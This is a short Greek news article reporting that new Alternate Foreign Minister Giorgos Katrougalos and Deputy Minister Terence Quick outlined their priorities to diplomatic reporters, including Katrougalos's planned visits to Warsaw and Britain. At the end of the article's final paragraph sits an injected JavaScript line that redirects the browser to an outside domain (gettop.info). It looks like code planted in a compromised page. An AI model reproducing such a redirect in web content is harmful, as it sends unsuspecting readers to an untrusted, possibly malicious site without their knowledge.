Κατρούγκαλος από το νέο «πόστο»: Στόχος μας, με ενιαία φωνή, η ενίσχυση της εξωστρέφειας

0
11

 

  Το στίγμα των προτεραιοτήτων τους στα πεδία των Ευρωπαϊκών Υποθέσεων, των Διεθνών Οικονομικών Σχέσεων και της Ομογένειας σκιαγράφησαν σε άτυπη συνάντηση ενημέρωσης και γνωριμίας με τους διπλωματικούς συντάκτες ο νέος αναπληρωτής υπουργός Εξωτερικών Γιώργος Κατρούγκαλος και ο νέος υφυπουργός Εξωτερικών για την Απόδημο Ελληνισμό Τέρενς Κουίκ.

Ο Γιώργος Κατρούγκαλος, ο οποίος μαζί με το χαρτοφυλάκιο των Ευρωπαϊκών Υποθέσεων παρέλαβε και των Διεθνών Οικονομικών Σχέσεων, έδωσε έμφαση στον συντονισμό και στη συλλογική λειτουργία του υπουργείου Εξωτερικών. «Παρότι έχουμε ο καθένας τη δική του σφαίρα αρμοδιοτήτων, έχουμε αποφασίσει να λειτουργούμε εντελώς συλλογικά, διότι υπηρετούμε κοινούς σκοπούς» τόνισε χαρακτηριστικά ο νέος αναπληρωτής υπουργός Εξωτερικών. Μάλιστα, όπως προσέθεσε, την κατεύθυνση για συλλογική λειτουργία έδωσε και ο ίδιος υπουργός Εξωτερικών Νίκος Κοτζιάς, σε συνάντηση που είχε με όλη την πολιτική ηγεσία του υπουργείου μετά τον ανασχηματισμό της κυβέρνησης.

Πρώτος σταθμός του Γιώργου Κατρούγκαλου, ως αναπληρωτή υπουργού Εξωτερικών, είναι η Βαρσοβία, στο πλαίσιο των αρμοδιοτήτων του για τις Διεθνείς Οικονομικές Σχέσεις. Στη συνέχεια, θα μεταβεί απευθείας στην Μεγάλη Βρετανία, όπου θα πραγματοποιήσει σειρά διαδοχικών συναντήσεων και ομιλιών.
Ειδικότερα, θα συναντηθεί με τον Βρετανό ομόλογό του, τον υπουργό Εργασίας, τον «σκιώδη» αντιπρόεδρο και τον «σκιώδη» υπουργό Εργασίας του Εργατικού Κόμματος, καθώς και με συνδικάτα. Επίσης, θα μιλήσει σε επενδυτές σε εκδήλωση που διοργανώνει το ελληνοβρετανικό επιμελητήριο την Δευτέρα και θα δώσει δύο διαλέξεις στο London School of Economics και στην Οξφόρδη για την πορεία της χώρας μας .

Κάνοντας ειδική αναφορά για το χαρτοφυλάκιο των Διεθνών Οικονομικών Σχέσεων, έδωσε προτεραιότητα στην εξωστρέφεια. «Στόχος μας είναι να δώσουμε μια ενιαία φωνή και συντονισμό στην αναγκαία εξωστρέφεια που πρέπει να έχει η οικονομία», ανέφερε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here